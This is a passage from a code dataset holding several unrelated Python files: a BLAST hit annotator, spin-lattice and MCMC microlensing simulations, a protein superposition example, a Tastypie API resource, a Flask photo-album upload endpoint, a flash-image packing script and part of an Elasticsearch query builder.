not a file'.format(hits_filename),file=sys.stderr)\n exit(1)\n if not os.path.isfile(annotations_filename):\n print('\"{}\" is not a file'.format(annotations_filename),file=sys.stderr)\n exit(1)\n\n f_annot = open(annotations_filename,'r')\n genus_dict = {}\n species_dict = {}\n csv_reader = csv.DictReader(f_annot) #using first line as hits_header\n\n for row in csv_reader:\n centroid = row['centroid']\n genus = row['genus']\n if not genus:\n genus = 'NA'\n species = row['species']\n if not species:\n species = 'NA'\n genus_dict[centroid] = genus\n species_dict[centroid] = species\n f_annot.close()\n\n print('seq_id\\tpident\\tgenus\\tspecies',file=f_out)\n\n f_hits = open(hits_filename,'r')\n #sseqid = []\n #pident = []\n csv_reader = csv.DictReader(f_hits,fieldnames=hits_header,delimiter='\\t')\n for row in csv_reader:\n #print(row)\n sseqid = row[\"sseqid\"]\n pident = row[\"pident\"]\n\n if sseqid in genus_dict:\n genus = genus_dict[sseqid]\n species = species_dict[sseqid]\n print('{}\\t{}\\t{}\\t{}'.format(sseqid,pident,genus,species),file=f_out)\n else:\n print('Cannot find seq \"{}\" in lookup'.format(sseqid),file=sys.stderr)\n\n f_out.close()\n\n\n\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Annotate BLAST output',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n 'hits_file',\n metavar='FILE',\n help='BLAST output(-outfmt 6)',\n type=str\n )\n\n parser.add_argument(\n '-a',\n '--annotations',\n help='Annotaiton file',\n metavar='FILE',\n default='',\n )\n\n parser.add_argument(\n '-o',\n '--outfile',\n help='Output file',\n metavar='FILE',\n default='',\n )\n\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"assignments/07-csv/blastomatic.py","file_name":"blastomatic.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"529486834","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.insert(0, '../lib')\nfrom sw import *\n\nimport os\nnum_corrida = \"10_bis\"\n\nos.makedirs(\"../data/corrida\" + num_corrida + \"/figs\", exist_ok=True)\nos.makedirs(\"../data/corrida\" + num_corrida + \"/theta\", exist_ok=True)\nos.makedirs(\"../data/corrida\" + num_corrida + \"/phi\", exist_ok=True)\nos.makedirs(\"../data/corrida\" + num_corrida + \"/E\", exist_ok=True)\nfile = open(\"../data/corrida\" + num_corrida + \"/params.txt\", 'w')\n\nNs = 20\nJ = 3\nD = 0.2 * J\nK = 0.5 * (D**2 / J)\nBi = 0\nBf = 2\nBp = 0.02\nBb = 1000 * (D**2 / J)\n\nB_iter = np.arange(Bi, Bf, Bp) * (D**2 / J)\nN_c = B_iter.size\n\ndef D_dm(xs, ys, xv, yv):\n v = np.zeros(3)\n v[0] = xv - xs\n v[1] = yv - ys\n return v\n\ndef B_caja(x, y, Bin, Bbo, Ns):\n B = np.zeros(3)\n c = np.heaviside((Ns-2) - x, 1)\n c *= np.heaviside((Ns-2) - y, 1)\n c *= np.heaviside(x - 1, 1)\n c *= np.heaviside(y - 1, 1)\n B[2] = Bin * c + Bbo * (1 - c)\n return B\n\nparams = \"L = \" + str(Ns) + \"\\n\"\nparams += \"J = \" + str(J) + r\" meV\" + \"\\n\"\nparams += \"D = \" + str(D / J) + \" J\" + \"\\n\"\nparams += \"K = \" + str(K * J/D**2) + \" D^2/J\" + \"\\n\"\nparams += \"Bi = \" + str(Bi) + \" D^2/J\" + \"\\n\"\nparams += \"Bf = \" + str(Bf) + \" D^2/J\" + \"\\n\"\nparams += \"Bp = \" + str(Bp) + \" D^2/J\" + \"\\n\"\nparams += \"Bb = \" + str(Bb * J/D**2) + \" D^2/J\"\n\nfile.write(params)\nfile.close()\n\nx, y = np.mgrid[0:Ns, 0:Ns]\nred = np.array(list(zip(y.ravel(), x.ravel())))\nvecinos = gen_vecinos(red, 1)\n\nprint(\"De \" + str(39) + \" a \" + str(100) )\n\nfor i in range(39, 100):\n B = B_iter[i]\n \n theta0 = np.load(\"../data/corrida\" + num_corrida + \"/theta/corrida\" + num_corrida + \"_\" + \"37\" + \".npy\")\n phi0 = np.load(\"../data/corrida\" + num_corrida + \"/phi/corrida\" + num_corrida + \"_\" + \"37\" + \".npy\")\n E0 = np.load(\"../data/corrida\" + num_corrida + \"/E/corrida\" + num_corrida + \"_\" + \"37\" + \".npy\")\n\n theta, phi, E = gs_ac(lambda xs, ys, xv, yv: J,\n lambda xs, ys, xv, yv: D * D_dm(xs, ys, xv, yv),\n lambda xs, ys: K,\n lambda xs, ys: B_caja(xs, ys, B, Bb, Ns),\n theta0, phi0, red, vecinos, 3 * Ns**2)\n\n E = np.append(E0, E)\n\n dE = -np.diff(E)\n npasos = dE.size\n pasos = np.arange(npasos)\n x = np.copy(red[:, 0])\n y = np.copy(red[:, 1])\n u = np.sin(theta) * np.cos(phi)\n v = np.sin(theta) * np.sin(phi)\n\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.clf()\n\n fig, axs = plt.subplots(1, 2, figsize=(20, 8))\n\n axs[0].set_title(\"Convergencia\", size=20)\n axs[0].plot(pasos[-2*Ns**2:], dE[-2*Ns**2:], \"k\")\n axs[0].set_xlabel(\"Pasos\", size=15)\n axs[0].set_ylabel(r\"$\\Delta E$ [meV]\", size=15)\n\n axs[0].plot([], [], ' ', label=\"L = \" + str(Ns))\n axs[0].plot([], [], ' ', label=\"E = \" + str(E[-1]) + r\" meV\")\n axs[0].plot([], [], ' ', label=\"J = \" + str(J) + r\" meV\")\n axs[0].plot([], [], ' ', label=\"D = \" + str(D / J) + r\" $J$\")\n axs[0].plot([], [], ' ', label=\"K = \" + str(K * J/D**2) + r\" $\\frac{D^2}{J}$\")\n axs[0].plot([], [], ' ', label=\"B = \" + str(B * J/D**2) + r\" $\\frac{D^2}{J}$\")\n axs[0].plot([], [], ' ', label=\"Bb = \" + str(Bb * J/D**2) + r\" $\\frac{D^2}{J}$\")\n axs[0].legend()\n\n axs[1].set_aspect('equal', 'datalim')\n nz = axs[1].scatter(x, y, 350, np.cos(theta), vmin=-1, vmax=1, cmap=plt.cm.coolwarm_r)\n cb = fig.colorbar(nz, ax=axs[1], fraction=0.04, pad=0.05, ticks=[-1, -0.5, 0, 0.5, 1])\n cb.ax.set_title(r'$n_z$', size=30)\n cb.ax.tick_params(labelsize=15)\n cb.set_ticklabels([r\"$-1$\", r\"$-0.5$\", r\"$0$\", r\"$0.5$\", r\"$1$\"])\n axs[1].quiver(x, y, u, v, units='width', pivot=\"mid\", width=0.005, headwidth=3, scale=30)\n axs[1].axis(\"off\")\n\n plt.savefig(\"../data/corrida\" + num_corrida + \"/figs/corrida\" + num_corrida + \"_\" + str(i) + \".jpg\" )\n\n np.save(\"../data/corrida\" + num_corrida + \"/theta/corrida\" + num_corrida + \"_\" + str(i), theta)\n np.save(\"../data/corrida\" + num_corrida + \"/phi/corrida\" + num_corrida + \"_\" + str(i), phi)\n np.save(\"../data/corrida\" + num_corrida + \"/E/corrida\" + num_corrida + \"_\" + str(i), E)\n","sub_path":"scripts/corrida10_bis_c.py","file_name":"corrida10_bis_c.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"26571123","text":"import numpy as np\nimport SL_Lightcurve as lc\nimport matplotlib.pyplot as plt\nimport SL_Flux_Data as dat\nimport scipy.optimize as op\nimport emcee\n\ndef frange(start, stop, step):\n i = start\n while i < stop:\n yield i\n i += step\n \n#calculate the Flux parameters\ndef calc_F(model, y, sig2):\n '''solving for the flux parameters with a givin model using least squares'''\n #A\n A11 = np.divide((np.power(model,2)),sig2).sum()\n Adiag = np.divide(model,sig2).sum() \n A22 = np.divide(1,sig2).sum()\n A = np.array(([A11,Adiag], [Adiag, A22]))\n \n #C\n C1 = np.divide(np.multiply(model, y),sig2).sum()\n C2 = np.divide(y,sig2).sum()\n C = np.array(([C1], [C2]))\n \n #B\n B = np.linalg.solve(A,C)\n FS = float(B[0])\n FB = float(B[1])\n F = [FS, FB]\n return F\n \n#mcmc set up functions\ndef calc_Xi(y, model, yErr):\n '''Calculates Xią2 for a given model and magnification data (y) with error (yErr)'''\n sig2 = np.power(yErr, 2)\n F = calc_F(model, y, sig2)\n FS, FB = F\n Xi2 = np.divide(np.power(np.subtract(np.add(np.multiply(model, FS), FB), y),2),sig2)\n Xi = Xi2.sum()\n return Xi\n\ndef lnprior(params):\n '''checking prior meets conditions'''\n t0, u0, murel = params\n #no conditions\n return 0.0\n\ndef lnlike(params, x, y, yErr):\n '''likelihood'''\n dummy, model = lc.lightcurve(params, x) #magnification curve\n Xi = calc_Xi(y, model, yErr)\n return -0.5 * Xi\n\ndef lnprob(params, x, y, yErr):\n '''posterior probability'''\n lp = lnprior(params)\n if not np.isfinite(lp):\n return -np.inf\n else:\n return lp + lnlike(params, x, y, yErr)\n \ndef MCMC(dim, walkers, iters, args, paramsGuess, burn):\n ''' '''\n nll = lambda *args: -lnlike(*args)\n result = op.minimize(nll, paramsGuess, args=(x, y, yErr))\n \n print('\\n\\nRunning MCMC...\\n\\n')\n \n pos = [result[\"x\"] + 1e-4 * np.random.rand(dim) for i in range(walkers)]\n sampler = emcee.EnsembleSampler(walkers, dim, lnprob, args=args)\n pos, prob, state = sampler.run_mcmc(pos, iters) #100\n \n samples = sampler.chain[:, burn:, :].reshape((-1, dim))\n \n print('...MCMC COMPLETE\\n\\n')\n return nll, sampler, pos, prob, state, samples\n\n#True Parameters\nt0True = 50\nu0True = 0.2\nmurelTrue = 1/40\nparamsTrue = [t0True, u0True, murelTrue]\nFSTrue = 0.0016\nFBTrue = 0.0001\nFTrue = [FSTrue, FBTrue]\ndays = 100 #observation duration\n\n#generate fake data\nx, y, yErr = dat.generate(paramsTrue, 200, days, 0.01, 0.1, 0.1, FTrue) \n#including the FTrue parameter means y and yerr will come out as flux values\nevent = []\nfor f in frange(0,days,0.25):\n event.append(f)\nxTrue, yTrue = lc.lightcurve(paramsTrue, event) #builds magnification lightcurve\nyyTrue = dat.y_flux(yTrue, FTrue) #convert magnification values to flux\nplt.figure()\nxy = plt.errorbar(x, y, yerr=yErr, linestyle = 'None', color = 'k', \n capsize=2, marker = '.', markersize=2)\nxyyTrue = plt.plot(xTrue,yyTrue, 'c') #plot flux lightcurve\nplt.xlabel(\"Time (days)\")\nplt.ylabel(\"Flux\")\n\n\n#mcmc\nparamsGuess = [40, 0.4, 1/30]\ndim = len(paramsGuess)\nwalkers = 100\niters = 500\nargs = (x, y, yErr)\nburn = 100\n\nnll, sampler, pos, prob, state, samples = MCMC(dim, walkers, iters, args, paramsGuess, burn)\n\nt0MC, u0MC, murelMC = map ( lambda v : (v[1], v[2]-v[1] , v[1]-v[0]), zip(*np.percentile(samples, [16, 50, 84], axis=0)))\n\nparamsMC = [t0MC[0], u0MC[0], murelMC[0]]\n\nprint(paramsMC)\n\nxMC,yMC = lc.lightcurve(paramsMC, event)\nsig2 = np.power(yErr, 2)\ndummy, model = lc.lightcurve(paramsMC, x) #magnification curve\nF = calc_F(model, y, sig2)\nyyMC = dat.y_flux(yMC, F)\n\nxyMC = plt.plot(xMC,yyMC, 'r')\n\n#testing\n#dummy, model = lc.lightcurve(paramsTrue, x) #magnification curve\n#FTest = calc_F(model, y, sig2)\n#yTest = dat.y_flux(model, FTest)\n#xyTest = plt.plot(x,yTest, 'm')\n\nplt.show()\n","sub_path":"Progress Reports/0817/SL_MCMC.py","file_name":"SL_MCMC.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"183508940","text":"#!/usr/bin/env python\n# (C) 2018 OpenEye Scientific Software Inc. All rights reserved.\n#\n# TERMS FOR USE OF SAMPLE CODE The software below (\"Sample Code\") is\n# provided to current licensees or subscribers of OpenEye products or\n# SaaS offerings (each a \"Customer\").\n# Customer is hereby permitted to use, copy, and modify the Sample Code,\n# subject to these terms. OpenEye claims no rights to Customer's\n# modifications. Modification of Sample Code is at Customer's sole and\n# exclusive risk. Sample Code may require Customer to have a then\n# current license or subscription to the applicable OpenEye offering.\n# THE SAMPLE CODE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED. OPENEYE DISCLAIMS ALL WARRANTIES, INCLUDING, BUT\n# NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n# PARTICULAR PURPOSE AND NONINFRINGEMENT. In no event shall OpenEye be\n# liable for any damages or liability in connection with the Sample Code\n# or its use.\n\n#############################################################################\n# Simple superimposition of a fit protein on to a reference protein\n#############################################################################\nimport sys\nimport os\nfrom openeye import oechem\nfrom openeye import oespruce\nimport tempfile\n\n\n# @ \ndef ReadProteinFromPDB(pdb_file, mol):\n ifs = oechem.oemolistream()\n ifs.SetFlavor(oechem.OEFormat_PDB, oechem.OEIFlavor_PDB_Default | oechem.OEIFlavor_PDB_DATA | oechem.OEIFlavor_PDB_ALTLOC) # noqa\n\n if not ifs.open(pdb_file):\n oechem.OEThrow.Fatal(\"Unable to open %s for reading.\" % pdb_file)\n\n temp_mol = oechem.OEGraphMol()\n if not oechem.OEReadMolecule(ifs, temp_mol):\n oechem.OEThrow.Fatal(\"Unable to read molecule from %s.\" % pdb_file)\n ifs.close()\n\n fact = oechem.OEAltLocationFactory(temp_mol)\n mol.Clear()\n fact.MakePrimaryAltMol(mol)\n return (mol)\n# @ \n\n\ndef main(argv=[__name__]):\n if len(argv) not in [3, 4, 5]:\n oechem.OEThrow.Usage(\"%s [global|ddm|weighted] [nowrite]\" % argv[0]) # noqa\n\n inp_method = \"\"\n if len(argv) > 3:\n allowed_methods = [\"global\", \"ddm\", \"weighted\"]\n inp_method = argv[3]\n if inp_method not in allowed_methods:\n oechem.OEThrow.Warning(\"%s superposition method is not supported.\\n\" % argv[3]) # noqa\n sys.exit(1)\n\n do_write = True\n if len(argv) == 5:\n if argv[4] != \"nowrite\":\n oechem.OEThrow.Warning(\"%s is not a valid option.\\n\" % argv[3])\n sys.exit(1)\n else:\n do_write = False\n\n ref_prot_file = argv[1]\n fit_prot_file = argv[2]\n\n ref_prot = oechem.OEGraphMol()\n fit_prot = oechem.OEGraphMol()\n\n ref_success = ReadProteinFromPDB(ref_prot_file, ref_prot)\n fit_success = ReadProteinFromPDB(fit_prot_file, fit_prot)\n\n if (not ref_success) or (not fit_success):\n oechem.OEThrow.Fatal(\"Unable to protein(s) from PDB file.\")\n\n opts = oespruce.OESuperpositionOptions()\n if inp_method == \"ddm\":\n opts.SetSuperpositionType(oespruce.OESuperpositionType_DDM)\n elif inp_method == \"weighted\":\n opts.SetSuperpositionType(oespruce.OESuperpositionType_Weighted)\n\n superposition = oespruce.OEStructuralSuperposition(ref_prot, fit_prot, opts) # noqa\n rmsd = superposition.GetRMSD()\n\n superposition.Transform(fit_prot)\n\n pdb_ext = \".pdb\"\n str_pos = fit_prot_file.find(pdb_ext)\n base_name = fit_prot_file[0:str_pos]\n temp_dir = tempfile.mkdtemp()\n output_fit_file = os.path.join(temp_dir, base_name + \"_sp.oeb.gz\")\n\n print(\"RMSD for the fit of\",\n fit_prot_file, \"to\", ref_prot_file, \"is\", rmsd, \"Angstroms.\\n\")\n print(\"Writing superimposed fit protein to\", output_fit_file)\n\n if do_write:\n ofs = oechem.oemolostream(output_fit_file)\n oechem.OEWriteMolecule(ofs, fit_prot)\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","sub_path":"venv/Lib/site-packages/openeye/examples/spruce/simplesuperposition.py","file_name":"simplesuperposition.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357225840","text":"from tastypie.resources import ModelResource,Serializer\nfrom cartridge.shop.models import Product\nfrom django.contrib.auth.models import User\n\n\nclass GetAllProducts(ModelResource):\n class Meta:\n queryset = Product.objects.all()\n allowed_methods = ['get']\n # fields = ['first_name','last_name','email']\n excludes = ['id']\n resource_name = 'product'\n include_resource_uri = False\n serializer = Serializer(formats=['json'])","sub_path":"mezshop/shop/api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"375572324","text":"'''\nAutor: Marcos Felipe da Silva Jardim\n-------------------------------------------\n'''\nfrom flask import Flask, Blueprint, render_template, session, request, url_for, redirect, escape\nimport config, modelo, os, json, shutil\nfrom datetime import datetime\nfrom time import time\nfrom bson import ObjectId\nfrom hashlib import sha1\n\n# Registrando o blueprint\nalbum = Blueprint('album', __name__, template_folder = 'templates');\n\nARQUIVOS_ACEITOS = ['png', 'jpg','jpeg', 'gif']\n\nCAMINHO = '/dados/static/imagens/'\n\n@album.route('/get_album', methods = ['GET'])\ndef get_album():\n mdb = modelo.Consulta.obter_db_mongo()\n # Passe sobre cada album e a cada imagem coloque o caminho statico dela\n dados = []\n for alb in mdb.albuns.find({}):\n temp = {'_id': str(alb['_id']), 'album': alb['album'], 'fotos': []}\n for ft in alb['fotos']:\n temp['fotos'].append({'_id': str(ft['_id'])})\n for key in ft.keys():\n if key == '_id': continue\n temp['fotos'][-1][key] = os.path.join('/static/imagens/', ft[key])\n dados.append(temp)\n return json.dumps(dados)\n\n\n@album.route('/album', methods = ['GET','POST', 'PUT', 'PATCH', 'DELETE'])\ndef album_():\n mdb = modelo.Consulta.obter_db_mongo()\n if request.method == 'GET': ## Retorna os albuns disponiveis\n return render_template('index.html')\n elif request.method == 'POST': # Cria o album\n resp = modelo.Utils.valida_dados(request)\n if 'erro' in resp.keys():\n return json.dumps(resp)\n # Veja se tem o atributo nome\n if not 'nome' in resp.keys():\n return json.dumps({'erro': 'O ATRIBUTO NOME NÃO FOI ENVIADO'})\n if len(resp['nome']) < 2:\n return json.dumps({'erro': 'O NOME DEVE TER AO MENOS 2 CARACTERES'})\n # Veja se consegue recuperar o nome\n if mdb.albuns.find({'album':resp['nome']}).count() > 0:\n return json.dumps({'erro': 'ESTE NOME DE ALBUM JÁ EXISTE'})\n # Insira o album\n ID = str(mdb.albuns.insert_one({\n 'album': resp['nome'],\n 'fotos': []\n }).inserted_id)\n return json.dumps({\n 'sucesso': 'ALBUM CRIADO COM SUCESSO',\n '_id': ID\n })\n elif request.method == 'PUT': # INclusao de imagens\n resp = modelo.Utils.valida_dados(request)\n if 'erro' in resp.keys():\n return json.dumps(resp)\n # Veja o campo _id existe\n if not '_id' in resp.keys() or not resp['_id'] or len(resp['_id']) < 1:\n return json.dumps({'erro': 'FAVOR INFORMAR A QUAL ALBUM SE DESEJA ADICIONAR FOTOS'})\n # Veja se o album existe\n if mdb.albuns.find({'_id': ObjectId(resp['_id'])}).count() < 1:\n return json.dumps({'erro': 'ALBUM NÃO ENCONTRADO'})\n # Veja se contem o campo arquivos\n total = len(list(request.files.getlist('arquivos')))\n if total == 0:\n return json.dumps({'erro': 'FAVOR ENVIAR IMAGENS PARA COMPOR O ALBUM'})\n erros = [None for i in range(total)]\n # Faz loop sobre cada campo dentro de arquivos\n for x, arq in enumerate(request.files.getlist('arquivos')):\n # Valida o arquivo\n if not modelo.Utils.validar_arquivo(arq.filename, ARQUIVOS_ACEITOS):\n erros[x] = 'ARQUIVO INVÁLIDO %s' % arq.filename\n else: # Salva o arquivo na pasta e armazena ele no album\n # Pegando a extensao e criand o novo nome\n *_, ext = arq.filename.rsplit('.', 1)\n # Gerando novo nome para os 3 tamanhos de imagens\n nom = sha1(str(time()).encode()).hexdigest()\n novo_nome = nom+'-nor.'+ext\n novo_nome_peq = nom+'-peq.'+ext\n novo_nome_med = nom+'-med.'+ext\n try: # Tenta salvar o arquivo\n caminho_completo = os.path.join(CAMINHO, novo_nome)\n caminho_completo_peq = os.path.join(CAMINHO, novo_nome_peq)\n caminho_completo_med = os.path.join(CAMINHO, novo_nome_med)\n arq.save(caminho_completo)\n # Rotaciona ele na posicao correta\n modelo.Utils.rotacionar_imagem(caminho_completo)\n # Salva a imagem nos 2 formatos\n modelo.Utils.rotacionar_imagem(caminho_completo, (320,320), caminho_completo_peq)\n modelo.Utils.rotacionar_imagem(caminho_completo, (640,480), caminho_completo_med)\n\n # Agora inclui este nome de arquivo no banco\n mdb.albuns.update_one(\n {'_id': ObjectId(resp['_id'])},\n {'$push':{\n 'fotos': {'nor': novo_nome, 'med': novo_nome_med, 'peq': novo_nome_peq,\n '_id': ObjectId()}\n }}\n )\n except OSError:\n erros[x] = 'Erro ao tentar salvar o arquivo'\n # Verifica se temos algum erro e então retorna o json erro com seu array de erros\n tem_erro = None\n for erro in erros:\n if isinstance(erro, str):\n tem_erro = True\n break\n if tem_erro:\n return json.dumps({'erro': erros})\n else:\n return json.dumps({'sucesso': 'TODAS AS IMAGENS ENVIADAS COM SUCESSO'})\n elif request.method == 'PATCH': # Para alteração no nome do album\n resp = modelo.Utils.valida_dados(request)\n if 'erro' in resp.keys():\n return json.dumps(resp)\n # Veja o campo _id existe\n if not '_id' in resp.keys() or not resp['_id'] or len(resp['_id']) < 1:\n return json.dumps({'erro': 'FAVOR INFORMAR A QUAL ALBUM SE DESEJA ADICIONAR FOTOS'})\n # Veja se existe nome para o album\n if not 'nome' in resp.keys() or not resp['nome'] or len(resp['nome']) < 1:\n return json.dumps({'erro': 'O NOVO NOME PARA O ALBUM NÃO FOI INFORMADO'})\n # Veja se o album existe\n if mdb.albuns.find({'_id': ObjectId(resp['_id'])}).count() < 1:\n return json.dumps({'erro': 'ALBUM NÃO ENCONTRADO'})\n # Atualizando o nome do album\n mdb.albuns.update_one({'_id': ObjectId(resp['_id'])}, {'$set': {'album': resp['nome']}})\n return json.dumps({\n '_id': resp['_id'],\n 'sucesso': 'ALBUM ALTERADO COM SUCESSO'\n })\n elif request.method == 'DELETE': # Para exclusão do album\n resp = modelo.Utils.valida_dados(request)\n if 'erro' in resp.keys():\n return json.dumps(resp)\n # Veja o campo _id existe\n if not '_id' in resp.keys() or not resp['_id'] or len(resp['_id']) < 1:\n return json.dumps({'erro': 'FAVOR INFORMAR A QUAL ALBUM SE DESEJA ADICIONAR FOTOS'})\n # Veja se o album existe\n if mdb.albuns.find({'_id': ObjectId(resp['_id'])}).count() < 1:\n return json.dumps({'erro': 'ALBUM NÃO ENCONTRADO'})\n # Tudo certo, agora selecione o album e então passe sobre cada imagem e a exclua\n for alb in mdb.albuns.find({'_id': ObjectId(resp['_id'])}):\n for foto in alb['fotos']:\n # Vamos tentar excluir cada imagem\n for im in foto.keys():\n if im == '_id': continue\n try:\n caminho_completo = os.path.join(CAMINHO, foto[im])\n os.remove(caminho_completo)\n except OSError:\n pass\n # Agora remova o album todo\n mdb.albuns.delete_one({'_id': ObjectId(resp['_id'])})\n\n return json.dumps({'sucesso': 'ALBUM EXCLUIDO COM SUCESSO'})\n \n \n\n \n \n\n \n\n\n\n","sub_path":"flask/album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":7788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225628524","text":"#!/usr/bin/env python3\n\n#\n# Copyright 2019 Simon Marchi \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n# Concatenate the files passed as arguments in a single file, and produce a\n# C 'table of contents'.\n\nimport argparse\nimport re\nimport os\n\n\ndef concat(out, files):\n \"\"\"Concaternate all files in out.\n\n Return a list where each element is a tuple:\n\n (filename, offset, size)\n \"\"\"\n file_list = []\n\n with open(out, 'wb') as o:\n for f in files:\n with open(f, 'rb') as i:\n # Seek to end\n i.seek(0, 2)\n size = i.tell()\n # Seek to beginning\n i.seek(0, 0)\n\n file_list.append((f, o.tell(), size))\n o.write(i.read())\n\n return file_list\n\n\ndef clean_filename(filename, keep_dir):\n \"\"\"Clean filenames for use in generated source code.\n\n Replace all non-alphanumeric characters by underscores. If keep_dir is\n False, remove the directory portion of the filename.\"\"\"\n\n if not keep_dir:\n filename = os.path.basename(filename)\n\n return re.sub('[^a-zA-Z0-9]', '_', filename)\n\n\ndef generate_h(h_file, metadata, flava):\n # Little exception for soldering...\n if flava == 'soldering':\n flava = 'ctf'\n\n with open(h_file, 'w') as h:\n h.write('/* This file is generated. */\\n')\n h.write('\\n')\n h.write('#ifndef {}\\n'.format(clean_filename(h_file, True)))\n h.write('#define {}\\n'.format(clean_filename(h_file, True)))\n h.write('\\n')\n h.write('#ifndef NSEC_FLAVOR_{}\\n'.format(flava.upper()))\n h.write('#error \"Flavor mismatch: this external flash header is generated for {}\"\\n'.format(flava))\n h.write('#endif\\n')\n h.write('\\n')\n h.write('\\n')\n h.write('struct external_flash_data {\\n')\n h.write(' unsigned int offset, size;\\n')\n h.write('};\\n')\n h.write('\\n')\n for f in metadata:\n fname = clean_filename(f[0], False)\n offset = f[1]\n size = f[2]\n h.write('__attribute__((weak))\\n')\n h.write('const struct external_flash_data external_flash_{} = {{\\n'.format(fname))\n h.write(' .offset = {},\\n'.format(offset))\n h.write(' .size = {},\\n'.format(size))\n h.write('};\\n')\n h.write('\\n')\n\n h.write('#endif\\n')\n\n\ndef main():\n argparser = argparse.ArgumentParser()\n argparser.add_argument('output-base')\n argparser.add_argument('flavor', choices=['ctf', 'speaker', 'admin', 'conf', 'trainer', 'bar_beacon', 'soldering'])\n argparser.add_argument('input-files', nargs='*')\n\n args = vars(argparser.parse_args())\n\n flava = args['flavor']\n output_base = args['output-base']\n output_base += '_' + flava\n h_file = output_base + '.h'\n bin_file = output_base + '.flashbin'\n\n input_files = args['input-files']\n\n metadata = concat(bin_file, input_files)\n generate_h(h_file, metadata, flava)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"nrf52/utils/pack_flash.py","file_name":"pack_flash.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65737009","text":"try:\n import os\n import sys\n import json\n print(\"Import : {} OK \".format(__file__))\nexcept Exception as e:\n print(\"Some modules are missing {} \".format(e))\n\n\nclass ElasticSearchQuery(object):\n\n def __init__(self, size=10, BucketName=None, source=[], min_score=0.5):\n\n \"\"\"Constructor \"\"\"\n\n self.size = size\n self.BucketName = BucketName\n self.min_score = min_score\n self.source = source\n self.baseQuery = {\n \"_source\":source,\n \"size\":self.size,\n \"min_score\": self.min_score,\n \"query\": {\n \"bool\": {\n \"must\": [],\n \"filter\": [],\n \"should\": [],\n \"must_not\": []\n }\n }\n }\n self.GeoBaseQuery = {\n \"_source\":self.source,\n \"size\":self.size,\n \"query\": {\n \"bool\" : {\n \"must\":{ \"match_all\":{}},\n \"should\":[],\n \"filter\": {}\n }\n }\n }\n self.aggtem = []\n self.base_higghlight = {\n \"pre_tags\":[\n \"\"\n ],\n \"post_tags\":[\n \"\"\n ],\n \"tags_schema\":\"styled\",\n \"fields\":{\n\n }\n }\n\n def match(self,field=None, value=None, boost=None, operation='should',analyzer=None):\n\n _ = {\n \"match\": {\n field: {\n \"query\": value\n }\n }\n }\n if boost is None:\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n if boost is not None:\n _[\"match\"][field][\"boost\"] = boost\n\n if analyzer is not None:\n _[\"match\"][field][\"analyzer\"] = analyzer\n\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n return self.baseQuery\n\n def match_phrase(self, field=None, value=None, boost=None, operation='should',analyzer=None):\n _ = {\n \"match_phrase\": {\n field: {\n \"query\": value\n }\n }\n }\n\n if boost is None:\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n if boost is not None:\n _[\"match_phrase\"][field][\"boost\"] = boost\n\n if analyzer is not None:\n _[\"match_phrase\"][field][\"analyzer\"] = analyzer\n\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n return self.baseQuery\n\n def terms(self,field=None, value=None, boost=None, operation='should'):\n\n _ = {\"term\" :{\n field : value\n }\n }\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n def add_aggreation(self, aggregate_name=None,\n field=None,\n type='terms',\n sort='desc',\n size = 10):\n\n _ = {\n aggregate_name:{\n type: {\n \"field\": field,\n \"order\" :\n {\"_count\" :\n sort\n },\n \"size\": size\n\n }\n }\n }\n self.aggtem.append(_)\n\n def complete_aggreation(self):\n _ = {\n \"aggs\":{\n\n }\n }\n for item in self.aggtem:\n for key,value in item.items():\n _[\"aggs\"][key] = value\n self.baseQuery[\"aggs\"] = _[\"aggs\"]\n return self.baseQuery\n\n def 